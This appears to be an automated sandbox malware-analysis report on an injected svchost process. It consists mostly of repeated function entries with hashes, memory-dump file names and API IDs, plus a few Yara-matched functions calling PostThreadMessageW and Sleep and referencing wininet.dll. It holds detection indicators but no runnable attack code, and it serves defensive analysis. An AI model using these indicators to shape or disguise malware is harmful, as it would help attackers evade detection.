                                                                                                                                • Instruction ID: 159e6b9a8c87ab6772aef97436f84bc157bd74f3fc7ec69429bb47341f37a4f7
                                                                                                                                • Opcode Fuzzy Hash: dfa9a5f5860a7941eecd4de34c7f4d36b4a3187a52665dae140885d0e2d1378d
                                                                                                                                • Instruction Fuzzy Hash: D390023170540C02D150B25854547860046D7D0311F99C011A4025659D87558B5576A1
                                                                                                                                Function 03572AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 5d97abc56b7be79a5c6e4baed7a2543d8db4995a4c6c3cf4ea583f10a3a2489a
                                                                                                                                • Instruction ID: bb2d9ff60167903135882ab1c6a3556c71aab08f7e172c41589b85a04ffa86f1
                                                                                                                                • Opcode Fuzzy Hash: 5d97abc56b7be79a5c6e4baed7a2543d8db4995a4c6c3cf4ea583f10a3a2489a
                                                                                                                                • Instruction Fuzzy Hash: DD900435311404030105F75C174454700C7D7D53713DDC031F5017555CD731CD715131
                                                                                                                                Function 03572AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 9f544d5bca54e2105390a3ad8a924ac7d92ee70f6596dbef0e5c9d34ca21a86a
                                                                                                                                • Instruction ID: 62eee3e28032652a3cee3761c5cd73f479c45e7deb2fa4ef879cd2002161097d
                                                                                                                                • Opcode Fuzzy Hash: 9f544d5bca54e2105390a3ad8a924ac7d92ee70f6596dbef0e5c9d34ca21a86a
                                                                                                                                • Instruction Fuzzy Hash: 71900225321404020145F658164454B0486E7D63613D9C015F5417595CC72189655321
                                                                                                                                Function 03572F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: a6a5813f2353bf39e4a152bb67d1d85241ec24c8eba7929ecfd1f5e973676432
                                                                                                                                • Instruction ID: 6d5b222a0f62db53fc5b95ab31557e7ee5b50262cf3aab6058fa01a1d96d82b1
                                                                                                                                • Opcode Fuzzy Hash: a6a5813f2353bf39e4a152bb67d1d85241ec24c8eba7929ecfd1f5e973676432
                                                                                                                                • Instruction Fuzzy Hash: F090026134140842D100B2585454B460046D7E1311F99C015E5065559D8719CD526126
                                                                                                                                Function 03572FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 5552ff27ed38fdf7b8b2579f1b4c43cbead5f11e14f8c9866c7f681bd5754c47
                                                                                                                                • Instruction ID: eae4651246cda45a2ccbe3c396d0afd765965ca343e324362d4f29e71bd95b34
                                                                                                                                • Opcode Fuzzy Hash: 5552ff27ed38fdf7b8b2579f1b4c43cbead5f11e14f8c9866c7f681bd5754c47
                                                                                                                                • Instruction Fuzzy Hash: 15900221311C0442D200B6685C54B470046D7D0313F99C115A4155559CCA1589615521
                                                                                                                                Function 03572FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 1ee8d4dfd1c0b376ff5c8482859030c79dd521c769bf5c0e423878235c464d2f
                                                                                                                                • Instruction ID: 5dde4f39399ffbcb89e53f09c5812cf7512857b0504eec7f22b9ae50fcd4ae15
                                                                                                                                • Opcode Fuzzy Hash: 1ee8d4dfd1c0b376ff5c8482859030c79dd521c769bf5c0e423878235c464d2f
                                                                                                                                • Instruction Fuzzy Hash: 57900221701404424140B26898849464046FBE1321799C121A4999555D865989655665
                                                                                                                                Function 03572EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 4466e5728bb890779200661bf0e38b72581c818b84f28d3acd28e8511bc5a467
                                                                                                                                • Instruction ID: 957ebda07f91b14d52a41c8cbd5ace61a48632d2c21951bdcd93ff4b771760cc
                                                                                                                                • Opcode Fuzzy Hash: 4466e5728bb890779200661bf0e38b72581c818b84f28d3acd28e8511bc5a467
                                                                                                                                • Instruction Fuzzy Hash: DF90026130180803D140B65858446470046D7D0312F99C011A606555AE8B298D516135
                                                                                                                                Function 03572E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 388da6fcac4a14600bcf289742667d1aadabd12a3c557ee136350d8449854584
                                                                                                                                • Instruction ID: 2854e459298965992e089223f5fe7da0ffbabcac43467303c941df2e6f18af77
                                                                                                                                • Opcode Fuzzy Hash: 388da6fcac4a14600bcf289742667d1aadabd12a3c557ee136350d8449854584
                                                                                                                                • Instruction Fuzzy Hash: 5590022170140902D101B2585444656004BD7D0351FD9C022A502555AECB258A92A131
                                                                                                                                Function 03572D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 8337b097b2ae4b62bca3a4e6b87dfb40b3904bebf806f6004bedfa3e88184bd5
                                                                                                                                • Instruction ID: a66a380f2618cf76aed092c2962f9eb370a9acc3360d389fd048201e447ead72
                                                                                                                                • Opcode Fuzzy Hash: 8337b097b2ae4b62bca3a4e6b87dfb40b3904bebf806f6004bedfa3e88184bd5
                                                                                                                                • Instruction Fuzzy Hash: 6590022931340402D180B258644864A0046D7D1312FD9D415A401655DCCA1589695321
                                                                                                                                Function 03572D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 79a638b3c366cdf25c270388efdddbc0e11318d457a420637c75b6566de9044a
                                                                                                                                • Instruction ID: 02f3288c67d0b8e74ae7417ae34ee6e3f84eda75accf350528d982ea127402e2
                                                                                                                                • Opcode Fuzzy Hash: 79a638b3c366cdf25c270388efdddbc0e11318d457a420637c75b6566de9044a
                                                                                                                                • Instruction Fuzzy Hash: B790022130140403D140B25864586464046E7E1311F99D011E4415559CDA1589565222
                                                                                                                                Function 03572DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: e8dc8e4d837f76038781e3e591eea9fa3b80493b7cd226883a41c7bec0a9640f
                                                                                                                                • Instruction ID: f2beaaa74330732e25fd8a08b949f1543cbd948280e184a31abf589d3ad3703d
                                                                                                                                • Opcode Fuzzy Hash: e8dc8e4d837f76038781e3e591eea9fa3b80493b7cd226883a41c7bec0a9640f
                                                                                                                                • Instruction Fuzzy Hash: FC900221342445525545F25854445474047E7E03517D9C012A5415955C86269956D621
                                                                                                                                Function 03572DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 6ccd23a833bb840e8264dce2594608ffdb558aadf62a2e9ba05e1108593b6a30
                                                                                                                                • Instruction ID: 26917ed0f73f38a4eace80e7b34893c04d04172b55752e347161c2f58b8eb265
                                                                                                                                • Opcode Fuzzy Hash: 6ccd23a833bb840e8264dce2594608ffdb558aadf62a2e9ba05e1108593b6a30
                                                                                                                                • Instruction Fuzzy Hash: 9E90023130140813D111B2585544747004AD7D0351FD9C412A442555DD97568A52A121
                                                                                                                                Function 03572C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 7f43630e6e2dd0b9835160b37934e8f8b285751827890edcde4cbb50a200f53a
                                                                                                                                • Instruction ID: 4d0691fd16245d2f77c510a439641c8e8bbd8c8539167eab49d681fad819afb8
                                                                                                                                • Opcode Fuzzy Hash: 7f43630e6e2dd0b9835160b37934e8f8b285751827890edcde4cbb50a200f53a
                                                                                                                                • Instruction Fuzzy Hash: 7C90023130148C02D110B258944478A0046D7D0311F9DC411A842565DD879589917121
                                                                                                                                Function 03572C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 0f08132bcb134343e2536a16f9449f81fb528c8d8431e6dfb50d774c24539a0c
                                                                                                                                • Instruction ID: decfa182cbeb0519ed6a9cac113e0d3b81e508070b1074b323c03d067af35d85
                                                                                                                                • Opcode Fuzzy Hash: 0f08132bcb134343e2536a16f9449f81fb528c8d8431e6dfb50d774c24539a0c
                                                                                                                                • Instruction Fuzzy Hash: 3290023130140C42D100B2585444B860046D7E0311F99C016A4125659D8715C9517521
                                                                                                                                Function 03572CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 30639fd39c5e244f01f4df69e3b066ad90b7ab90f98a9e99a2a2d9c97e121878
                                                                                                                                • Instruction ID: 95231c4e9910b48c213e678abe9171d474fcb96a18e340b89a50064e04fcba6b
                                                                                                                                • Opcode Fuzzy Hash: 30639fd39c5e244f01f4df69e3b066ad90b7ab90f98a9e99a2a2d9c97e121878
                                                                                                                                • Instruction Fuzzy Hash: 0A90023130140802D100B69864486860046D7E0311F99D011A902555AEC76589916131
                                                                                                                                Function 035735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: d3c647256941c7591f67b9c1b33ef351aa0f8012d3bb8240517a09a8a4625660
                                                                                                                                • Instruction ID: 635ff0fb3b3614e60f566736777f56efcbdcc4d2a4cdcdff574c233184230ac5
                                                                                                                                • Opcode Fuzzy Hash: d3c647256941c7591f67b9c1b33ef351aa0f8012d3bb8240517a09a8a4625660
                                                                                                                                • Instruction Fuzzy Hash: 7D90023170550802D100B25855547461046D7D0311FA9C411A442556DD87958A5165A2
                                                                                                                                Function 035739B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 3834294808883dfae1e9d0bb6f75905d261b8926a62c3168090066222e119a09
                                                                                                                                • Instruction ID: 295967581174012070ee20fa07e333704b256ffe5d27894d0e01658dd420e91f
                                                                                                                                • Opcode Fuzzy Hash: 3834294808883dfae1e9d0bb6f75905d261b8926a62c3168090066222e119a09
                                                                                                                                • Instruction Fuzzy Hash: 0A90022134545502D150B25C54446564046F7E0311F99C021A4815599D865589556221
                                                                                                                                Function 007C09B9 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 480 7c09b9-7c09c0 481 7c0a18-7c0a91 480->481 482 7c09c2-7c09c4 480->482 487 7c0ac7-7c0adb 481->487 488 7c0a93-7c0aa4 481->488 483 7c09b8 482->483 484 7c09c6-7c09d4 482->484 483->480 484->481 489 7c0ade-7c0afb 487->489 490 7c0b44-7c0b6a call 7d1a00 487->490 493 7c0b6c-7c0b7b PostThreadMessageW 490->493 494 7c0b8a-7c0b90 490->494 493->494 495 7c0b7d-7c0b87 493->495 495->494
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 7-j38IBI$7-j38IBI
                                                                                                                                • API String ID: 0-374207719
                                                                                                                                • Opcode ID: 507a5f4515b1976fab8b538e4586a5bdefc63c3b679351c3434526897b152a86
                                                                                                                                • Instruction ID: 3dc18ad5ccf791c24eab33353847578fc96c37369be3f4e342b7517cf97d224b
                                                                                                                                • Opcode Fuzzy Hash: 507a5f4515b1976fab8b538e4586a5bdefc63c3b679351c3434526897b152a86
                                                                                                                                • Instruction Fuzzy Hash: 1C21CDB2904695EAE711DBB89C42DEFBFA8EE51314704829CF880DB301D72A8D0783E0
                                                                                                                                Function 007C0B00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 496 7c0b00-7c0b3d call 7db280 call 7dbc90 call 7c42c0 503 7c0b44-7c0b6a call 7d1a00 496->503 504 7c0b3f call 7b1400 496->504 507 7c0b6c-7c0b7b PostThreadMessageW 503->507 508 7c0b8a-7c0b90 503->508 504->503 507->508 509 7c0b7d-7c0b87 507->509 509->508
                                                                                                                                APIs
                                                                                                                                • PostThreadMessageW.USER32(7-j38IBI,00000111,00000000,00000000), ref: 007C0B77
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: MessagePostThread
                                                                                                                                • String ID: 7-j38IBI$7-j38IBI
                                                                                                                                • API String ID: 1836367815-374207719
                                                                                                                                • Opcode ID: 383e82e3a2b3e4b0e17dbecfa8cf074bd60fd8e3a99c2050676ce08334285f52
                                                                                                                                • Instruction ID: d4bbac30bc7b1c0b710d90bc05efd90c738a626674127408c6426f40ecda8297
                                                                                                                                • Opcode Fuzzy Hash: 383e82e3a2b3e4b0e17dbecfa8cf074bd60fd8e3a99c2050676ce08334285f52
                                                                                                                                • Instruction Fuzzy Hash: EC01A5B190020CBAEB10AAE08C81DEFBB7CEF41394F418169FA04A7241D6285E0647B1
                                                                                                                                Function 007D37D4 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                                • API String ID: 0-1269752229
                                                                                                                                • Opcode ID: 76fe1e564044650a02a9e144149ae24caf7edad596cfb1a38e1bc65c152f238e
                                                                                                                                • Instruction ID: 2c34cfc8368d47dff8bc9356941038a185fa50ef594da4c39c8a88baf2a70c7f
                                                                                                                                • Opcode Fuzzy Hash: 76fe1e564044650a02a9e144149ae24caf7edad596cfb1a38e1bc65c152f238e
                                                                                                                                • Instruction Fuzzy Hash: BF4116B1600246BBD714CFA4CC85BEABBB9EB44314F04416EF9496B380C379AA41CBA1
                                                                                                                                Function 007D38A0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 007D397B
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7b0000_svchost.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Sleep
                                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                                • Opcode ID: f4cd713e2bd3a4d179eb18165490e9740d7b754564b138a215f4a60048b98b39
                                                                                                                                • Instruction ID: 6fde94e79cebba82a2a2a551848251823cfd8a41ca684111ee6f5ea48dbcd489
                                                                                                                                • Opcode Fuzzy Hash: f4cd713e2bd3a4d179eb18165490e9740d7b754564b138a215f4a60048b98b39
                                                                                                                                • Instruction Fuzzy Hash: B331AEB1600605BBD714DFA4C885FEBB7B9FB84714F04421DFA596B380C3B46A40CBA1
                                                                                                                                Function 007CF2CB Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
